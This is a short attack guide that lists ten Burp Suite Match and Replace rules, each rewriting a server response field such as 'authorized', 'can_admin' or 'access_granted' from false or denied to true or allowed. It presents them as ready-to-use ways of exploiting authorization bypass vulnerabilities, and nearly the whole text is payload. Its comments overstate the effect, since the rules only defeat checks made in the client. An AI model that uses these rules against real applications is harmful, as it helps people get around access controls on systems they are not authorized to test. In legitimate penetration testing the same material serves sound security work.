Authorization Bypass Examples
Use these Burp Suite Match and Replace rules to exploit authorization bypass vulnerabilities:
1. Access Control Bypass:
{
"comment": "Response Manipulation",
"enabled": true,
"is_simple_match": false,
"rule_type": "response_body",
"string_match": "\"authorized\":false",
"string_replace": "\"authorized\":true"
}
// This rule bypasses access controls
// Example: "authorized":false becomes "authorized":true
2. Read Permission Bypass:
{
"comment": "Response Manipulation",
"enabled": true,
"is_simple_match": false,
"rule_type": "response_body",
"string_match": "\"can_read\":false",
"string_replace": "\"can_read\":true"
}
// This rule bypasses read permissions
// Example: "can_read":false becomes "can_read":true
3. Write Permission Bypass:
{
"comment": "Response Manipulation",
"enabled": true,
"is_simple_match": false,
"rule_type": "response_body",
"string_match": "\"can_write\":false",
"string_replace": "\"can_write\":true"
}
// This rule bypasses write permissions
// Example: "can_write":false becomes "can_write":true
4. Delete Permission Bypass:
{
"comment": "Response Manipulation",
"enabled": true,
"is_simple_match": false,
"rule_type": "response_body",
"string_match": "\"can_delete\":false",
"string_replace": "\"can_delete\":true"
}
// This rule bypasses delete permissions
// Example: "can_delete":false becomes "can_delete":true
5. Admin Permission Bypass:
{
"comment": "Response Manipulation",
"enabled": true,
"is_simple_match": false,
"rule_type": "response_body",
"string_match": "\"can_admin\":false",
"string_replace": "\"can_admin\":true"
}
// This rule bypasses admin permissions
// Example: "can_admin":false becomes "can_admin":true
6. Status Bypass:
{
"comment": "Response Manipulation",
"enabled": true,
"is_simple_match": false,
"rule_type": "response_body",
"string_match": "\"status\":\"denied\"",
"string_replace": "\"status\":\"allowed\""
}
// This rule bypasses status restrictions
// Example: "status":"denied" becomes "status":"allowed"
7. Role Bypass:
{
"comment": "Response Manipulation",
"enabled": true,
"is_simple_match": false,
"rule_type": "response_body",
"string_match": "\"has_role\":false",
"string_replace": "\"has_role\":true"
}
// This rule bypasses role checks
// Example: "has_role":false becomes "has_role":true
8. Permission Grant Bypass:
{
"comment": "Response Manipulation",
"enabled": true,
"is_simple_match": false,
"rule_type": "response_body",
"string_match": "\"granted\":false",
"string_replace": "\"granted\":true"
}
// This rule bypasses permission grants
// Example: "granted":false becomes "granted":true
9. Resource Access Bypass:
{
"comment": "Response Manipulation",
"enabled": true,
"is_simple_match": false,
"rule_type": "response_body",
"string_match": "\"access_granted\":false",
"string_replace": "\"access_granted\":true"
}
// This rule bypasses resource access
// Example: "access_granted":false becomes "access_granted":true
10. Feature Access Bypass:
{
"comment": "Response Manipulation",
"enabled": true,
"is_simple_match": false,
"rule_type": "response_body",
"string_match": "\"feature_enabled\":false",
"string_replace": "\"feature_enabled\":true"
}
// This rule bypasses feature access
// Example: "feature_enabled":false becomes "feature_enabled":true